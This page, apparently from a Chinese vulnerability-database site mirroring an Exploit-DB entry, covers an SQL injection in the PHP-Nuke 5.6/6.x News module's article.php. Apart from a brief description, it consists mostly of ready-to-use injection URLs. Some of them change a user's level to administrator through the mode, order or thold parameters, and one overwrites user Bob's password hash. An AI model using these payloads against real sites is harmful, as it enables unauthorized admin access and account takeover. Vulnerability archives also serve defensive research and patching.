PHP-Nuke 5.6/6.x News Module – ‘article.php’ SQL Injection

PHP-Nuke 5.6/6.x News Module – ‘article.php’ SQL Injection

漏洞ID 1053781 漏洞类型
发布时间 2003-03-22 更新时间 2003-03-22
图片[1]-PHP-Nuke 5.6/6.x News Module – ‘article.php’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-PHP-Nuke 5.6/6.x News Module – ‘article.php’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22413
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7172/info

It has been reported that an input validation error exists in the article.php file included with PHPNuke as part of the News module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database, and gain unauthorized access to user accounts.

if magic_quotes_gpc=OFF :

Change our level (into admin) :
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4

or

http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4

or

http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4


Change the user Bob's password :
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&order=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*

相关推荐: USRobotics Broadband-Router GET Request DoS Vulnerability

USRobotics Broadband-Router GET Request DoS Vulnerability 漏洞ID 1100702 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2003-02-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享